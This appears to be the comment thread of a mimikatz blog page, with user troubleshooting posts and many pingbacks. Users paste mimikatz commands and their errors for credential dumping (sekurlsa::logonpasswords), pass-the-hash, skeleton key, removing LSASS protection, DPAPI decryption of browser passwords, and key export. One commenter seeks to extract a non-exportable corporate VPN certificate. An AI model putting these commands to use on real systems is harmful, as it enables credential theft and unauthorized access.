    mimikatz # crypto::capi
    Local CryptoAPI patched

    mimikatz # crypto::keys /export
    * Store : ‘user’
    * Provider : ‘MS_ENHANCED_PROV’ (‘Microsoft Enhanced Cryptographic Provide
    r v1.0’)
    * Provider type : ‘PROV_RSA_FULL’ (1)
    * CNG Provider : ‘Microsoft Software Key Storage Provider’

    CryptoAPI keys :

    CNG keys :

    mimikatz #

    Can you please help? Should it work in XP?

    Mahir

    Répondre

    I have a laptop with access to both the local administrator account and a domain user account (offline/cached credentials).

    The domain user can connect to a corporate VPN which uses a certificate. I want to get the certificate which is non exportable.

    When running MimiKatz as the Local admin, it does not pull off the private certificate for the domain user account (maybe because it is not the current user?).

    I am not 100% sure its the private certificate I want yet as the VPN profile config refers to a Machine Cert.

    Any Tips?

    Répondre

    Hello,

    I’ve tried to decrypt some browser passwords from my old windows 7 laptop. With the help of mimikatz I had already success with some chrome passwords, but I don’t get the clue how to crack Internet Explorer. I took the blob structure from the registry (HKCU\Software\Microsoft/Internet Explorer/IntelliForms/Storage2) containing a Facebook password and typed the following in mimikatz:

    dpapi::masterkey /in:C:\…\Protect\\ /password:

    This is working fine so far, so the decrypted masterkey is stored in mimikatz’ cache. But as I try to decrypt the blob like this:

    dpapi::blob /in:C:\path\to\file\with\value\from\registry /entropy:c0400e6fabb4c395ff857d0614e66508ba8ba737c5 /unprotect

    …I get two errors:

    ERROR kull_m_dpapi_unprotect_blob ; CryptDecrypt (0x80090005)
    ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)

    What did I miss? Thanks in advance!

    Répondre

    Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals

    Ping : windows系统密码查看神器-mimikatz - 兼容并蓄 - 记 - 零零星星 - mimikatz - windows密码 - 密码查看 - HHTjim'S 部落格

    Ping : Penetration Testing Resources - Dexter CyberLab | Dexter CyberLab

    Ping : Latest Hacking Tools List for Security Professionals and Hackers

    Ping : Локальные и доменные пароли из hiberfil.sys — azbukait.ru

    Ping : What is Mimikatz? And how to defend against this password stealing tool – Menedar.com

    Ping : What is Mimikatz? And how this password-stealing tool works - TechnologyNEWS.win

    Ping : What is Mimikatz? And how this password-stealing tool works – Tech News

    Ping : What's Mimikatz? And the way this password-stealing device works | Doers Nest

    Ping : ¿Cómo puedo iniciar sesión como otro usuario en Windows (Vista) sin saber o cambiar su contraseña?

    Ping : 针对黑客和安全专业人员的完整渗透测试和黑客工具列表 - 极客谷

    Ping : Complete Penetration Testing & Hacking Tools List - Cybarrior

    Excellent work.
    I have 2 questions and sorry about my little knowledge.

    First, Using command: !+
    will elevate privileges to run as a driver.
    ?This will be set permanent in Registry?
    Because after running this command 2 or more times gives Error:
    ERROR kull_m_service_install ; StartService (0x00000003)
    ,that seeme to be due to the fact that is already running/already registered.

    Second Q: ,After using command :
    !processprotect /process:lsass.exe /remove
    ,this unProtection will be permanent or just until next computer Restart.?

    Répondre
    mimikatz # dpapi::masterkey
    Whenever i try to decrypt master key your program mimikatz crashes.

    Problem signature:
    Problem Event Name: APPCRASH
    Application Name: mimikatz.exe
    Application Version: 2.2.0.0
    Application Timestamp: 5cd8adba
    Fault Module Name: msvcrt.dll
    Fault Module Version: 7.0.9600.17415
    Fault Module Timestamp: 545055fe
    Exception Code: c0000005
    Exception Offset: 0000000000001913
    OS Version: 6.3.9600.2.0.0.256.48
    Locale ID: 1033
    Additional Information 1: c227
    Additional Information 2: c227427f4899e992de408789b23a521d
    Additional Information 3: 99a6
    Additional Information 4: 99a62dd7ee60746370fb30a127a32f2f

    Répondre

    .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
    .## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
    ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
    ## \ / ## > http://blog.gentilkiwi.com/mimikatz
    ‘## v ##’ Vincent LE TOUX ( [email protected] )
    ‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

    mimikatz # privilege::debug
    Privilege ’20’ OK

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

    It worked a couple of times before. Now it shows this error.

    Thanks in advance

    Répondre

    Im getting the following error on a Win7 box. It looks like there is no AV/protection as Im even allowed to drop mimikatz on disk without even getting flagged. Any idea how is this error being triggered?
    Sorry, but I dont have any sysinfo-like output. It was a Win7 workstation with no evident protection. (yes, im system)

    Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

    Répondre

    Hi, I got a serious question here…
    Where does the name « mimikatz » come from? what’s the reason for that name?

    Thanks

    Répondre

    Ping : Security Specialists - All Hacking Tools - List for Penetration Testing - Hacking - Hackers Third Eye Kashmir

    Ping : windows权限提升基础知识 | CN-SEC 中文网

    Ping : Assume Breach – Sichere IT-Infrastruktur mit dem TEAL Security Assessment - TEAL Technology Consulting GmbH

    Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Wacken Security

    Ping : Lista completa de ferramentas de teste de penetração e hacking – Information Security

    Ping : Silver & Golden Tickets – TerabitWeb Blog

    Ping : 记一次实战入侵某动作片站(影视站)-黑客培训基地_黑客接单平台

    Ping : Mimikatz |

    Ping : Pass-the-Hash умер. Да здравствует долгоиграющий Pass-the-Hash — КИБЕРВОИН

    Ping : Hacker's Favorite Tool: Mimikatz - Adlice Software

    I try to list processes of a memory dump file. I did the following commands:
    mimikatz # sekurlsa::minidump memdump.mem
    Switch to MINIDUMP : ‘memdump.mem’

    mimikatz # process::list

    But it list processes of the running computer but not the ones in memdump.mem.

    What is the correct syntax to do it ?

    Thanks a lot
    Great tool BTW! :)
    Franck

    Répondre

    Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Linux Mind

    Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Mehran Tajbakhsh

    Ping : Hack Like Mr. Robot, Own a Computer in 14 Seconds - Dark Reading Hacking News website Peneration Testing

    Ping : A Complete Penetration Testing & Hacking Tools List | INSIGHT

    Ping : Mimikatz: Витягуємо паролі користувачів Windows з пам’яті у відкритому вигляді - Windows для системних адміністраторів

    Ping : How to export unexportable all certificates – fast and easy – Wiedza

    Thank you for this great tool and the continuous development.

    I’m trying to pass the hash on a windows 10 (10.0.19042) machine where kaspersky is installed and here is the output.

    mimikatz(powershell) # privilege::debug
    Privilege ’20’ OK
    mimikatz(powershell) # sekurlsa::pth /user:someUser /domain:test.com /ntlm:{hash value}
    user : someUser
    domain : test.com
    program : cmd.exe
    impers. : no
    NTLM : {hash value}
    | PID 19796
    | TID 16984
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
    ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

    Any idea what is going on ? I searched a lot for a resolution but found nothing useful. is it something related to LSASS protection ?!

    Répondre

    Ping : 100 Greatest Hacking Instruments for Safety Professionals in 2020-Cyberblowing - Cyberblowing

    Ping : A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals – Hacker Observer

    Doing a school assignement, they gave me Mimikatz as subject.
    Truly amazed by the whole story and evolution of this Tool.
    Your slide presentation from 2012 realy helped in understanding a bit
    about the workings of this legendary tool. Dispite my petit knowledge of
    programming and linux etc.
    Vive la France
    Salut,
    Wouter Mulder

    Répondre

    I am receiving the below error.

    mimikatz # sekurlsa::dpapi
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

    Please suggest what mistake I am doing. I am trying to get masterkeys.

    Répondre

    Ping : 100 Greatest Hacking Instruments for Safety Professionals in 2020 – Jinsla News | Latest Cybersecurity

    Ping : Kerberos tickets: Comprehension and exploitation | kerberos attacks

    Ping : 100 Best Hacking Tools for Security Professionals in 2020 – Krypto Tech Lens

    Hi ! I have an error which I don’t understand when I launch misc::skeleton.
    I’m trying it on a Microsoft Windows Server 2019 (Version 10.0.17763 Build 17763) with Mimikatz 2.2.0 (arch x64) with a powershell run as administrator. ( I am DA )

    After doing a working privilige::debug, I tried to run misc::skeleton and got this error : ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)

    I hope you will be able to help me :)

    NB : you can reply in french if you want to

    Répondre
    Privilege ’20’ OK

    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

    comment je regle ça??

    how do i fix that???

    wtf is going on

    bordel, keski ce passe

    Répondre

    Laisser un commentaire Annuler la réponse

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *